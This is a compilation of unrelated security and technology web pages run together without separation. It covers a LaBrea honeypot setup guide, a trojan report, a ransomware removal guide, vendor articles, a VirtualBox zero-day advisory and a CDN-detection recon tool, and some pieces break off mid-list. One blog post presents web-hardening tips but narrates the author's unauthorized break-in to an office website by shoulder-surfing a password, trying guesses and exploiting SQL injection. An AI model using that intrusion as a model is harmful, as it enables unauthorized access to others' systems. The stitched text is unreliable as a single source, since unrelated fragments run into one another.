Author: James Hurff Author: Mayank Sharma A honeypot is software that attracts hostile activity by masquerading as a vulnerable system. While it’s running, the honeypot gathers information about attackers and their techniques and patterns. Honeypots distract crackers from more valuable machines on a network, and provide early warning about attacks and exploitation trends. LaBrea was conceived in the aftermath of the Code Red worm attack in July 2001, when software developer Tom Liston posted an idea on the INTRUSIONS list at incidents.org for a means of combatting the constant scanning of his IP addresses and ports. A port scan is a method used by crackers to determine what ports are open or in use on a system in a network. By using various tools a cracker can send data to TCP or UDP ports one at a time. Based on the response received the port scan utility determines if that port is in use. The cracker uses this information to focus his efforts to exploit weaknesses on the ports that are open. Liston’s idea got a positive response from Mihnea Stoenescu, who used a modified version of a comprehensive security program called Couic. Tom hacked Couic for his purpose and called it CodeRedneck. He further improved CodeRedneck to fake machines with fake vulnerabilities — in essence creating the honeypot which he now called LaBrea. LaBrea keeps a watch to see if someone is trying to find a free IP address on your network. LaBrea looks for address resolution protocol (ARP) requests without any ARP replies to see whether that IP is in use. When LaBrea sees this behavior it assumes this is a cracker port-scanning your system, and creates an ARP reply with a bogus MAC address and sends it back to the requester. This helps determine the IP address of the port scanner. LaBrea then listens to all incoming traffic to the bogus MAC address it just created. To convince the attacker that he is talking to a real machine, LaBrea allows TCP connections. The cracker sends an SYN (synchronize) packet, which is acknowledged with a SYN/ACK (acknowledgment). You can configure LaBrea to keep track of its activity in a log file or display it on your screen. Please note that there are legal implications in some countries for using honeypots. For instance, some countries have laws against wiretapping, and in one sense, implementing a honeypot can be seen as a serious violation of wiretapping law [why?]. Setting it up As root, first install the libdnet RPM: rpm -i libdnet-1.7-0.1.fc2.dag.i386.rpm Next extract the LaBrea tarball and install it: tar -zxvf labrea-2.5-stable-1.tar.gz cd labrea ./configure --wth-libdnet=/usr make make install LaBrea also needs to be run as root. LaBrea has lots of switches. Understand which ones to use for better results. For instance: labrea -i eth1 -o -v -z This invokes LaBrea in the verbose ( -v) mode sending all the log info to stdout (standard output) instead of syslog ( -o). To specify which interface LaBrea listens to, specify the -i switch. The -z option turns off nag messages that your LAN cards might not support. Testing the setup To test your new software, find a machine on your network and try to ping an unused local IP address. After three ‘Request timed out’ messages you should start getting a response. You can increase or decrease the time period that LaBrea takes to respond using the On the machine you just set up, you’ll see the IP address of the machine from which the ping originated. Now for the real stuff. Run Nessus on a free IP address. It’ll find the address as valid. On my network it reported security holes and security warnings on my unoccupied IP! Nmap showed more than 2,000 open ports and the services running on the virtual machine! A honeypot like LaBrea is a useful security tool that complements intrusion detection systems and firewalls. Mayank Sharma is a freelance technology writer and FLOSS migration consultant in New Delhi, India. Author: Chris Preimesberger In fact, DaimlerChrysler proved that it had complied with the original contract by certifying its use of Unix System V code with SCO Group 11 weeks (on April 6, 2004) before Michigan Judge Rae Lee Chabot’s dismissal of most of the case on July 21. DaimlerChrysler IT manager Norman Powell did this by attesting that no SCO-owned code had been used in DaimlerChrysler’s shop for more than seven years, thus there were no CPUs to be counted. (With thanks to Pam Jones at Groklaw, see DaimlerChrysler’s Motion for Summary Dismissal, dated April 15, 2004.) DaimlerChrysler: Full compliance with agreement “DaimlerChrysler has provided SCO with a certification that complies with the express requirements of Section 2.05 (of the original contract with AT&T Information systems),” the company said on Page 24 of its 54-page Motion for Summary Dismissal. “Specifically, the DaimlerChrysler letter provides SCO with the required information about Designated CPUs (explaining that none are in use); certifies that an authorized person reviewed DaimlerChrysler’s use; and states that no software product licensed under the subject agreement is being used or has been used in more than seven years, and as a result, there is full compliance with the provisions of the subject agreement,” DaimlerChrysler said. SCO Group then accepted DaimlerChrysler’s certification response, company spokesman Blake Stowell told Newsforge. In effect, an out-of-court agreement was reached, although it was not made public. At this point, SCO Group could have dropped the litigation, but its counsel elected not to do so. “We’re satisfied that DaimlerChrysler did finally certify their compliance with the existing software agreement,” SCO Stowell said. Then why didn’t SCO Group drop the suit, after its customer (DaimlerChrysler) offered its explanation of compliance on April 6? “One of the reasons our lawyers decided to pursue the case is that I think they wanted to investigate further whether DaimlerChrysler had any possible misuse of our code within Linux in their systems,” Stowell said on Monday. However, the SCO lawyers’ plan backfired when Judge Chabot stuck to the letter of the contract, which dealt strictly with certification of Unix System V code usage. As it turned out, DaimlerChrysler “was not obligated to tell us anything about their use of Linux,” Stowell said. More litigation to come? Will SCO Group continue its investigation into whether DaimlerChrysler is somehow misusing proprietary Unix code in its Linux systems? “I don’t know,” Stowell said. “I can’t answer that. It’s up to our lawyers.” For this particular case, SCO Group retained the Southfield, Mich., firm of Seyburn, Kahn, Ginn, Bess and Serlin. A call to case lead attorney Joel Serlin Monday afternoon was not returned to NewsForge. Detroit-based DaimlerChrysler spokeswoman Mary Gauthier, who did not return calls requesting comment today, told ComputerWorld on July 21 — the day of the judgment — that “we are pleased with the judge’s ruling, and we look forward to finally resolving the one open issue.” Stowell said he does not believe SCO Group will pursue the final point in the Michigan case that is still open — that SCO Group wants to know why DaimlerChrysler didn’t respond to the certification request in a reasonable amount of time. In fact, DC responded to SCO on April 6 — about a month after the lawsuit was filed — explained its legal point of view, and offered certification information. This information is all included in the motion filed on April 15. That meant DaimlerChrysler took about three and a half months to respond to SCO’s first letter on Dec. 18, 2003 requesting an accounting of its Unix System V code. Author: JT Smith “Back in December iCanProgram.com announced that it would be offering its online “Introduction to Linux Programming” courses without fees in return for a voluntary donation to Cancer Research by the participants. These donations were made in memory of one of our founding partners who lost her own battle with Cancer last summer. This “learning for charity” formula has been a success far beyond our expectations. We have now offered our courses under this format to over 350 students worldwide. For those of you who missed out the first time round there are still openings in the 2 remaining courses that will be offered in the 2002 spring session. The 02 Apr edition of the Introduction to Linux Programming course has room. The 02 Apr edition of our newest advanced Linux Programming course titled Linux Programming the SIMPL way has room as well. m as well. Thanks once again to all those who have participated so far and given so generously to the cause of fighting Cancer.” Author: JT Smith “This article is a followup to an article entitled The Myth of Open Source Security Revisited. The original article tackled the common misconception amongst users of Open Source Software(OSS) that OSS is a panacea when it comes to creating secure software. The article presented anecdotal evidence taken from an article written by John Viega, the original author of GNU Mailman, to illustrate its point. This article follows up the anecdotal evidence presented in the original paper by providing an analysis of similar software applications, their development methodology and the frequency of the discovery of security vulnerabilities.” Author: JT Smith Author: JT Smith Author: JT Smith
SAM: The Static Analysis Module of the MAVERIC Mobile App Security Verification Platform The tremendous success of the mobile application paradigm is due to the ease with which new applications are uploaded by developers, distributed through the application markets (e.g. Google Play), and finally installed by the users. Yet, the very same model is causing serious security concerns, since users have no or little means to ascertain the trustworthiness of the applications they install on their devices. To protect their customers, Poste Italiane has defined the Mobile Application Verification Cluster (MAVERIC), a process for the systematic security analysis of third-party mobile apps that leverage the online services provided by the company (e.g. home banking, parcel tracking). We present SAM, a toolkit that supports this process by automating a number of operations including reverse engineering, privilege analysis, and automatic verification of security properties. We introduce the functionalities of SAM through a demonstration of the platform applied to real Android applications. - 1.Aktug, I., Naliuka, K.: ConSpec – A formal language for policy specification. Science of Computer Programming 74(1-2), 2–12 (2008) Special Issue on Security and TrustGoogle Scholar - 3.Christodorescu, M., Jha, S., Seshia, S.A., Song, D., Bryant, R.E.: Semantics-Aware Malware Detection. In: Proceedings of the 2005 IEEE Symposium on Security and Privacy, SP 2005, pp. 32–46. IEEE Computer Society, Washington, DC (2005)Google Scholar - 6.Idika, M.: A Survey of Malware Detection Techniques. Technical report, Purdue University (February 2007)Google Scholar - 10.Sekar, R., Gupta, A., Frullo, J., Shanbhag, T., Tiwari, A., Yang, H., Zhou, S.: Specification-based Anomaly Detection: A New Approach for Detecting Network Intrusions. In: Proceedings of the 9th ACM Conference on Computer and Communications Security, CCS 2002, pp. 265–274. ACM, New York (2002)Google Scholar
Fake video project 3d • 2010 The best examples of how to play with the viewers’ perception are fake videos, showing impossible situations like cars driving up ski-jumps. They could be real, they could be a fake, but in any case they are fun. With this kind of concept in mind, we were to make our own videos. Faked security cams at different places all around the campus should catch strange occurrences which were finally streamed at the “Beuth Box“. Tasks: storyboarding, 3D-modelling, 3D-animation, rendering. In team with: Annika Wenzel.
The most trusted source for download on the mobile OS platform , Google Play has now been caught for cataloguing some of the applications that contain trojan – a program that perform some malicious actions on your device without you consent . Cybersecurity analysts from Doctor Web virus have come across some of the applications that contains trojan which is programmed to work as an android bot Android.Circle.1 to perform their malicious tasks . The multifunctional bot , Andorid.Circle.1 , gains the trust of people by hiding under the name of some harmless applications . These harmless applications are under the category of images, programs with horoscopes, applications for online dating, photo editors, games and system utilities on Google Play which has over 18 modifications and over 700,000 downloads as commented by experts from Doctor Web virus . Android.Circle.1 is programmed in android based Kotlin language and is created using Multiple APK mechanism to support it in a variety of devices. Some examples of applications are as follows : HOW THIS TROJAN OPERATES ? The trojan embedded in these applications implements a mechanism and divides the main apk into several apk files as some of the malicious function performed by Android.Circle.1 are taken from the library libnative-lib.so which is located in one of such auxiliary divided APKs but the android OS is not able to recognize these multiple APKs and thus perceives the collection as a single application . Thus , Multiple APK mechanism acts a self defense mechanism for this trojan . On successfully installing, the trojan communicates with the Control and Commanding ( C&C ) server via secure HTTPS with additionally encrypted AES algorithm. The trojan modifies itself and disguise under a standard android application in the list of installed programs and presented with name com.google.security . The first task performed by the trojan that it sends the below information to the server : - packages – list of installed applications; - device_vendor – device manufacturer; - sRooted – root access; - install_referrer – information about the link where the application was installed; - version_name – a constant with a value of “1.0”; - app_version – a constant with a value of “31”; - google_id – user identifier in Google services; - device_model – device model; - device_name – device name; - push_token – Firebase identifier; - udid – unique identifier; - os_version – version of the operating system; - sim_provider – mobile operator. After sending this information , the trojan expects some commands in the form of messages from the Firebase Cloud Messaging Service . The server replies some BeanShell scripts commands and these instructions are saved in prefs.xml configuration file . These BeanShell Scripts are executed with the help of libnative-lib.so open source library built into the trojan which a Java code interpreter and allows to execute Java-based code . Some of the tasks performed by the bot is as follows : - remove the Trojan application icon from the software list in the main screen menu; - remove the Trojan application icon and load the link specified in the command in a web browser; - perform a click (click) on a loaded site; - show banner ad. Thus from the above tasks , displaying ads and forcing user to fall in the trap of attack , are the main intention of the attacker . Through ads , the attacker will be able to download the some malicious websites for phishing attacks though it is illegal to execute any third party code according terms and conditions of Google Play . The trojan displays ads as : Despite these basic function , the bot can also load and execute any code based on the instruction that it received from the server but it is restricted by device configuration . There are some of the indicators or some applcations of this trojan network : Though all the detected modifications of the Android.Circle.1 have been removed form the Google Play , there are chances that attackers can place new versions to it . - Scan the application with the help of antivirus before installing it . - Do not click on the third party links in the installed apps or enter any sensitive information on that link . - Do not click on the ads displayed in the app . RSU is security researcher who is constantly working to make world a secure place to live. He is working day and night in Cyber Security area.
Nostro Ransomware Removal Guide Nostro Ransomware Description and Removal Instructions: Malware Category: Ransomware Nostro Ransomware is an updated version of the GarrantyDecrypt Crypto-Ransomware virus. Nostro Ransomware targets PCs running Windows OS. Every file that has been encrypted will have its extension changed to: .NOSTRO. Unfortunately, still, there is no way of decrypting the files encrypted by Nostro Ransomware. The distribution of Nostro Ransomware is related to installing different third-party toolbars, all kinds of free software, files from P2P networks and torrents, random clicking on ads, pop-up windows, banners, or even downloading attached files from your personal e-mail inbox or other file sharing applications, bogus flash player and fake video software for viewing online content. When running, Nostro Ransomware will start encrypting certain types of files stored on local or mounted network drives using a RSA-2048 bit public-key cryptography, with the private key stored only on a control server. Nostro Ransomware will create #RECOVERY_FILES#.txt and put a shortcut to it in every folder where a file was encrypted. Those files contain instructions explaining how to pay the ransom. For the victims to pay the ransom, the virus asks them to contact the creators at the following e-mail address: [email protected]. When Nostro Ransomware is initiated on the computer, it will inject deep into the system infecting Explorer.exe and svchost.exe, modify the registry to start with Windows, and disable the Automatic Repair feature. Once active, it will start the process of encrypting files. These types of ransomware are very hard to detect. Nevertheless, the virus will show its presence after the encryption finishes. Nostro Ransomware will not just encrypt files and block your computer, it will also collect valuable information that will be sent to the control servers. Such software could lead to more malware coming into your computer and even cause a loss of data. Such threats are not to be underestimated! *Please note that, still, there is no way of decrypting the files encrypted by Nostro Ransomware. The infection may also delete all your Restore points. Thus, the only way to restore will be by using a backup copy. How To Remove: There is an automatic removal, using specialized software suite like SpyHunter (recommended for novice users and fast removal), or manual removal method (recommended for experts), using your own skills to remove the infection. Automatic Nostro Ransomware Removal: We recommend using SpyHunter Malware Security Suite. You can download and install SpyHunter to detect Nostro Ransomware and remove it. SpyHunter will automatically scan and detect all threats present on your system. Learn more about SpyHunter, or if you want to check out the Install Instructions. SpyHunter`s free diagnosis offers free scans and detection. You can remove the detected files, processes and registry entries manually, by yourself, or to purchase the full version to perform an automatic removal and also to receive free professional help for any malware related queries by the technical support department. *Note that the removal of the virus will NOT decrypt your files. Still, there is no way of decrypting the files encrypted by Nostro Ransomware. Manual Nostro Ransomware Removal: *Please note that you should proceed at your own risk. Some incorrectly taken actions might lead to loss of data or destroy your system. Therefore, the manual removal is strongly recommended for experts only. For everyday users, SpywareTechs.com recommends using SpyHunter or any other reputable security solution. 1. Remove Nostro Ransomware by Restoring Your System to a Previous State: 1. Restart your PC into Safe Mode with Command Prompt. To do that, turn your machine off and then start it up again. Then, when the first POST screen appears (white text), start tapping the F8 key repeatedly. ***For Windows 8/10: If you are using Windows 8/10, you need to hold the Shift button and tap the F8 key repeatedly, this should load the new advanced “recovery mode”, where you can choose the advanced repair options to show up. On the next screen, you will need to click on the Troubleshoot option, then select Advanced Options and select Windows Startup Settings. Click on the Restart button, and you should now be able to see the Advanced Boot Options screen. 2. Use the arrow keys on your keyboard to select the option “Safe Mode with Command Prompt” and hit “Enter”. 3. When the command prompt loads, type the following: Windows XP: C:\windows\system32\restore\rstrui.exe and press Enter Windows Vista/7/8/10: C:\windows\system32\rstrui.exe and press Enter 4. System Restore should start up. You will see a list of restore points. Try use a restore point created just before the date and time the problem occurred. When System Restore completes, start your computer in Windows normal mode and scan your computer using anti-spyware software like SpyHunter. When System Restore completes, start your PC in Normal mode. Then, perform a scan using an anti-spyware software like SpyHunter, as there could still be some infections left on your system. *Please note that your files may remain encrypted, depending on whether your System Files Protection is set to recover only system settings or the system settings along with the previous version of the files. 2. Files and Registry entries associated with Nostro Ransomware:
This procedure will specifically allow a known bad website to display its content. Caution: This procedure overrides the blocking of a known bad website. Viewing the site may be harmful to your computer. Proceed with caution. To unblock a website using Manage Allowed Websites: 1. Click Manage Allowed Websites. 2. Click Add Website. 3. Type in the domain URL. example: google.com (not www.google.com) 4. Tap the Enter key. Note: You can remove a website from the list later by clicking on the trash can. To unblock a website using Antivirus History: 1. Click View History under Antivirus History, then click the Blocked Websites tab. 2. Click Allow next to the blocked URL to unblock it. Note: You can block it again by removing it from the Manage Allowed Websites list.
Why Data Security Posture Management Paves the Way Forward for Effective Data Security - By Karthik Krishnan - Oct 07, 2022 Enterprises are struggling with three key data challenges. First, there is massive growth in data, often it increases exponentially from year to year. Equally, there is massive migration of data to the cloud. And finally, the data that is worth protecting has become a very complex environment – from Intellectual Property to financial data to business confidential information to regulated PII/PCI/PHI data. All of these factors present unique challenges to data security. Traditional ways of protecting data like rule writing to discover what data users have that is worth protecting or relying on end users to ensure that data is shared with the right employees at all times simply doesn’t work in an environment such as the cloud where it is now very easy for employees to create, modify and shared sensitive content with anyone. Data Security Posture Management (DSPM) is emerging as a key technology area to solve these challenges. DSPM identifies and remediate risks to structured and unstructured data. It’s an emerging security practice enabled by automated tools that make it possible to secure content at an atomic level without unnecessary overhead or new IT skills. And it’s an enabling technology for a new, more dynamic approach to access management called purpose-based access control (PBAC). To understand DSPM, consider the similarly named Cloud Security Posture Management (CSPM) category. These solutions improve security by targeting cloud configuration errors, and they were a response to a spate of security breaches related to misconfigured Amazon S3 data storage buckets. Some of the most consequential misconfiguration incidents granted public access to sensitive data or the complete loss of administrative control for production cloud solutions. Like CSPM, DSPM also focuses on misconfigured access privileges that can lead to data loss. DSPM solutions, however, confront a more extensive and complex threat surface. A moderately complex cloud estate may house a few dozen storage instances and accounts for a handful of administrators. Contrast that threat surface with the complexity of an organization’s entire collection of unstructured data, which can run to tens of millions of files, and that is what DSPM protects. Confronted with the volume and diversity of content needing to be managed and secured, most organizations simply leave data security up to their end users. Few organizations are comfortable with that risk, but the rise of automated DSPM solutions offers some hope. They offer four capabilities essential to robust data protection: - Content discovery and categorization that provides the proper context for evaluating security best practices - Detection of access misconfigurations, inappropriate sharing, and risky use of email or messaging services - Evaluation of risks associated with data access and use - Risk remediation with the flexibility to tailor actions to suit business requirements Unlike CSPM, where protected assets – storage buckets, administrative interfaces, online applications, and the like – are well-defined and understood, user-created data is far more complex. Content categories range from valuable source code and intellectual property to regulated customer information and sensitive strategic documents. Accordingly, content discovery and accurate, granular categorization are essential precursors to effective DSPM. But categorization can require a significant initial investment and substantial ongoing maintenance. The two most common approaches – user-applied document tags and automation based on rules – lack the scalability and accuracy necessary for workable categorization. Detecting misconfigured access settings, overshared files, or the use of risky channels (like personal emails) is even more challenging. Why? Because, even with highly accurate data categorization, hard and fast rules surrounding who can and can’t view a specific data category usually don’t exist. It’s a high-stakes problem because over-constrained data can quickly impact business operations and agility, while overshared data is a potential security risk. Striking the right balance between access and security is critical. Of course, simply finding at-risk data isn’t enough to protect it. Assessing risk, remediating misconfigured access permissions, and fixing sharing errors complete the DSPM cycle. There’s no magic bullet: Different organizations have different definitions of what’s critical, what’s trivial, and what’s at risk. Evaluating and quantifying risk gives focus to the process of fixing it. Work on the big stuff. Ignore the trivial. Know the difference. All these tasks – categorizing content, detecting misconfigurations, and analyzing risk – can be accurately completed in DSPM solutions using deep learning technologies. With deep learning, the data (and related information about storage and usage) tells a rich and valuable security story. Advanced deep learning solutions autonomously categorize data; then compare access configurations, storage locations, and data handling practices across similar files to spot and assess risk. It’s the future of DSPM. It is also critical to do this with an easy deployment model that: - Is API based, agentless, and can be easy to deploy in 5-10 minutes and provides results in days vs months - Can work across unstructured and structured data - Can handle petabytes of data without requiring large security teams - Operates as a SaaS solution Data Security Posture Management protects your organization from data loss and breaches. Understanding your data, assessing risk, and remediating overly permissive access to sensitive information is at the heart of DSPM. Accurate, autonomous DSPM forms the foundation for more effective access control and overall data security.
When two Palo Alto Networks firewalls are deployed in an active/passive cluster, it is mandatory to configure the device priority. The device priority decides which firewall will preferably take the active role and which firewall will take over the passive role when both the firewalls boot up to become functional for the first time. However, there is an option called "Preemption" which influences this behavior on the event of it being enabled or disabled. When the Palo Alto Networks firewall cluster (Primary and Secondary) boots up for the first time, the device with a higher priority (lower numerical value) will take up the active role and the device with a lower priority (higher numerical value) will take up the passive role, in spite of the Preemption option being enabled or disabled. See the diagram below: With Preemption Enabled The Preemption option must be enabled on both Palo Alto Networks firewalls, as shown in the diagrams below. If the primary firewall fails, then the secondary firewall will take the active role and start to forward the traffic. When the primary firewall comes up, it will immediately resume the active role as it is the device with the higher priority (lower numerical value). With Preemption Disabled If the primary firewall fails, the secondary firewall will take the active role and start to forward the traffic. When the primary firewall comes up, it will not resume the active role even though it has a higher priority setting. The device which is currently in the active role will remain the active firewall. In this case, the secondary firewall will resume the active role. The device priority and the Preemption is configured under Device > High Availability > General > Election Settings, as shown below: During the first boot, the lowest value (higher priority) will become active During the first boot, the highest value (lower priority) will become passive When Preemption is enabled, when the device reboots then the device with lowest value will become active When Preemption is disabled, when the device reboots then the the device, which was active earlier, will resume the active role in spite of the configured priority
4 Common Web Vulnerability to Fix Secure your website from Hackers I will say, without websites Internet is some kind of useless for most of Internet users. So lots of website getting developed and lots of website getting exploited. Vulnerability exist in some place where the developer don’t care that much to check. But a malicious hacker know how to think like a developer too 😉 . Here are few vulnerability that is not getting caught that easily by developers and not getting fixed. If you have a website or planning to get one then tell him to keep extra eye to these vulnerability when developing! Parametered URL is more open to attack When developers developing a site , they don’t take extra care to make it rest-style URL. The vulnerability may exist in anywhere of your site. But if the site using some kind of server side language like PHP,ASPx,JSP with parametering then the hacker get a bit happier. Because he gets some confidence to attack these parameter URL for Injection type attack. And those site are often vulnerable. Developers often forget to check any specific things, let alone all the URLs :). http://pusheax.com/vuln.php?variable=value is more interesting than http://pusheax.com/vuln/variable/value. It is still possible to make a injection attack but make harder for new hackers. If the developers don’t like to deal with .htaccess then they should always write code carefully and scan for vulnerability. SQLi,XSS and Code Execution after users logged in Many developers like easy coding and like to trust registered users. They sometime forget that a hacker can be his user too. And a hacker know in where a developer may ignore the secure coding. I have seen many website with rest-style URL. But after logged in everything just in a parameters(http://pusheax.com/vuln.php?variable=value). Most of them was vulnerable to Sql Injection and XSS. Some developer was clever to make the website without parameters. But they forgot to secure the forms such as search form. And that form often was vulnerable to Sql Injection. Data extracted Comfortably with sql injection in protected area. In these kind of situation the burp suite became handy for me. If xss is found then it might be easier to phish the other users including admin through private message, because users are friend each other 🙂 and there are many reason to trust. Code execution is a powerful attack can take you to full control of the system. I have found less Code Execution vulnerability but it is still exist in protected area of some websites. Basically an experienced hacker have more focus on POST method based injection in target’s protected area. Unusual Error Message lead to further attack Many website , even high profile website not configured very properly. Wrong input cause displaying unusual errors message. Which is giving you some valuable information like path,username,software version and many more. A hacker can learn more about the target from these kind of error message. Using these information a attacker can exploit the login page, find Local File Inclusion or Remote File Inclusion vulnerability which may bring a big damage to your website. You should carefully handle the error message to prevent the attacker to learn about your site. Internal Users are Unaware I had got full control of a web database through Social Engineering Sql Injection. Let me tell you the history 🙂 . I often visited an office(You Guess what office it might be ) . I had good relation with the office employee. I challenged them that i would get free services from them. They accepted! Then i told them that i was just doing fun with them. They forgot my challenge. For few days i was exploring their site. no vulnerability found. Only found a URL where internal users can logged in, but 3 fail try lock the account(crazy, they are scared of hackers). I decided to try Social Engineering. I was sure that they won’t click a link. Physically social engineering is only way. I visit their office again and ordered a service. From my place i can see his keyboard typing and clearly his fingers movement. I was looking at him typing. When i ordered the service he logged to that site to entry the order. Bad luck for him, at that time i memorized his finger movement. He was typing the password very carefully and slowly because wrong try may lock his account , lol. So the some characters was visible too. In 24 hours i tried 8 wrong passwords and finally the 9th try was the successful. After the logon, everything was secure except search form which was vulnerable to error based sql injection. And this leaded me to take control of the full website. I know my English is not like a native English speaker but still i just tried to express my words to you to secure your website. If you take care of these 4 Web security advise , i am sure your website will have some extra security and will be harder for a hacker to hack you. Thanks for reading!
Cyber risk and advisory programs that identify security gaps and build strategies to address them. MDR that provides improved detection, 24/7 threat hunting, end-to-end coverage and most of all, complete Response. Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged. Be protected by the best from Day 1. 24/7 Threat Investigation and Response. Expert hunting, research and content. Defend brute force attacks, active intrusions and unauthorized scans. Safeguard endpoints 24/7 by isolating and remediating threats to prevent lateral spread. Investigation and enhanced threat detection across multi-cloud or hybrid environments. Configuration escalations, policy and posture management. Detects malicious insider behavior leveraging Machine Learning models. Customer testimonials and case studies. Stories on cyberattacks, customers, employees, and more. Cyber incident, analyst, and thought leadership reports. Demonstrations, seminars and presentations on cybersecurity topics. Information and solution briefs for our services. MITRE ATT&CK Framework, Cybersecurity Assessment, SOC Calculator & more A zero-day vulnerability has been identified in VirtualBox that can be exploited to allow malware to escape from the virtual machine guest to the host machine. The security researcher Sergey Zelenyuk publicly released his findings on November 6th without notifying VirtualBox, meaning that no security patch is available at the time of publishing. Temporary mitigation measures were also released by Sergey (see What you should do about it). At this time, successful exploitation requires advanced technical skills to develop and chain together with additional privilege escalation exploits. This vulnerability does not affect type-1 hypervisors, meaning cloud environments are not impacted. For these reasons, widespread adoption/exploitation is not expected in the near term. Virtual machines (VMs) are the emulation of an operating system, which allows users to have multiple separate operating systems on one physical device. Escaping the sandbox refers to malware that is opened on the virtual machine, circumventing security and affecting the underlying operating system. Virtual systems are made to be separate from the underlying system and are often used for malware analysis if escape is possible the threat actor gains access to more information story on the host machine and there is a higher chance of lateral movement to additional machines. This zero-day vulnerability only affects type-two hypervisor of VirtualBox virtual machines. Type-two hypervisors are generally used for desktop machines, meaning that cloud environments are not affected. Sergey chose to release this vulnerability without notifying VirtualBox due to disagreements with the handling of vulnerability reporting and bug bounties; notably, the amount of time that passes before companies action the reported issue . GitHub: MorteNoir1/virtualbox_e1000_0day VirtualBox E1000 Guest-to-Host Escape Get notified when there's a new security advisory, and receive the latest news, intel and helpful tools & assets. You can unsubscribe anytime.
In light of the increasingly sophisticated attacks against the US public and private sectors, the Biden Administration announced a push toward Zero Trust Architecture, amid other cybersecurity reforms. The White House order was issued on May 12, and it included a host of measures aimed at improving the country’s resilience against cyberthreats. The announcement contained plans to remove barriers that block the sharing of threat information, as well as actions to modernize the Federal Government cybersecurity environment. A key part of the order was a requirement for each agency head to develop a plan for Zero Trust Architecture implementation within 60 days of the announcement. This plan must incorporate the migration steps set out in the National Institute of Standards and Technology’s (NIST) guidelines. The White House order also stipulates that migrations to cloud technology “shall also adopt Zero Trust Architecture, as practicable.” This announcement is likely to have major implications in the cybersecurity world. With the federal government moving to adopt Zero Trust Architecture, it’s likely that other industries will soon follow suit. It’s worth asking what this framework is and what it means in the context of your own security stance. What Is Zero Trust Architecture? Simply put, Zero Trust Architecture is a security model that assumes no place is safe from cyberthreats, even an organization’s own network. Let’s explain it by contrasting Zero Trust Architecture with other security models. Under other designs, an organization’s network has a perimeter, and the entities inside it are considered secure. It’s much like the terminal at an airport. Once you have gone through the security checkpoint, you are presumed free from any weaponry that could endanger others or the facility. After going through the security, you can enter the food court, the gift shops, or the bathroom without having to verify your identity or go through a metal detector. Under this type of security model, systems can communicate with each other within the network relatively freely. Users are deemed safe and given special privileges, because they are on the “secure” side of the firewall. In contrast, Zero Trust Architecture accepts that bad actors may be inside the perimeter of the “secure” network. Recognizing this possibility, the Zero Trust security model involves making the secure perimeter as small as possible to minimize the potential for compromise. It also takes steps to continually evaluate actors that are inside the network for possible threats. Overall, the goal of Zero Trust Architecture is to protect devices and data from malicious actors. It improves on other security models by enforcing more granular access controls, which helps limit the potential for unauthorized access. In Zero Trust Architecture, a trust zone is an area where those granted access are also granted access to other parts of the network. Returning to our airport analogy, everywhere beyond the security gates is a shared trust zone where you can move relatively freely. When you go to board your plane, you must go through another security checkpoint into a smaller trust zone. The smaller a trust zone is, the less data and access to assets that it has. This helps to limit the potential damage that a bad actor can cause. If a bad actor gained access to the terminal, they could harm everyone within the secure perimeter of the terminal. If the bad actor only had access to the plane, the potential harm would be much more limited (the analogy breaks down a little here, because someone with access to a plane would also have had access to the terminal, but you get the picture). The Core Tenets of Zero Trust Architecture In order to build a more secure environment while still offering usable services, Zero Trust Architecture focuses on: - Authorization: Only granting users access to the minimum level of data and services that are required to fulfill their role. - Authentication: Verifying the identity of authorized users through logins, keys, certificates, multi-factor authentication and other measures. This helps to protect from unauthorized access. - Limited trust zones: Making trust zones as small as possible to reduce potential impacts if compromised. - Availability: The above security measures are critical, but they need to be designed in a way that maintains availability. A service is useless if it is incredibly secure, but unavailable much of the time. - Minimized delays: The vetting processes are important, but authentication should be implemented in a way that doesn’t slow down access. LuxSci and Zero Trust Alignment LuxSci has long aligned its services with Zero Trust principles. Our Zero Trust-aligned features include: - Dedicated servers with virtualized sandboxing and dynamic per-customer micro-segmentation. We put each dedicated customer in its own trust zone. - Dynamic network and user access monitoring that can block suspected threats. - Granular access controls for users and systems that access customer data. - Encrypted email. The Biden Administration’s push toward Zero Trust Architecture shows just how critical it is for protection in the current environment. Secure your organization by contacting us now to find out how it can get onboard with LuxSci’s Zero Trust-aligned services.
How to automate CDN detection? Note: The french version is available here: http://bssiblog.supertag.fr/automatiser-detection-cdns/ As any pentesting, the recon phase is primordial and determine if an attempt to access the targeted system will be successful. A multitude of tools allows performing ports scan, DNS enumeration, CMS detection and various other types of assessments. However, none of those allow to easily and efficiently detect if a given website is protected by a CDN (Content Delivery Network). CDNs become more and more popular those days and provide features to shield websites against numerous types of attacks such as: - Denial of Service - Distributed Denial of Service - Distributed Reflection Denial of Service - XSS, SQLI through WAF (Web Application Firewall) CDNs are a real challenge for penetration tester which often hide the target's real address, preventing any further system based attacks. Its detection will result in a gain of time, avoiding unnecessary assessments. WhichCDN has 5 different detection methods: - Whois Detection CDNs could impact the whois command results by changing several fields e.g. Name Server, nserver, etc. - Error Server Detection A few CDNs disclose information when trying to directly access the IP addresses resolved by the host command, exposing themselves to the world. - HTTP Header detection Some CDNs could be quite intrusive and, modify the HTTP header by adding or replacing existing fields which allow detecting their presence. - DNS detection When resolving the DNS of a given domain name, it is common to find the name server associated to the CDN in place. - Subdomain detection Big companies often use a subdomain to configure their CDN, by trying to access such subdomain, it is possible to determine which technology is used. Usage of WhichCDN to detect CDNs WhichCDN is an extremely simple python script to use. This one is available at the following address: Once downloaded, (with the « git clone » command), WhichCDN can be used as followed: As it can be seen on the picture above, 0x00sec.org is protected by Cloudflare. It is just as simple as that. A l’heure de la rédaction de cet article, WhichCDN est en mesure de supporter les CDNs suivants : - Microsft Azure Axes of improvements The state of the art of this domain didn’t prove that it is possible to bypass such security measures but if, one day, a method is leaked, it would be awesome to add attack vectors to work around those filtration systems. Moreover, it would be relevant to populate the list of supported CDNs with other service providers such as: - Verizon Digital Media services WhichCDN claims to be the inescapable tool in therms of CDNs detection, allowing pentesters and security experts to speed up the reconnaissance phase by highlighting if a given website is protected by a CDN. This valuable information will inexorably avoid time wasting, where every second is precious. Upstream, it is important to note that whichCDN has been added to blackArch Linux and, soon, Kali Linux. Happy pentesting.
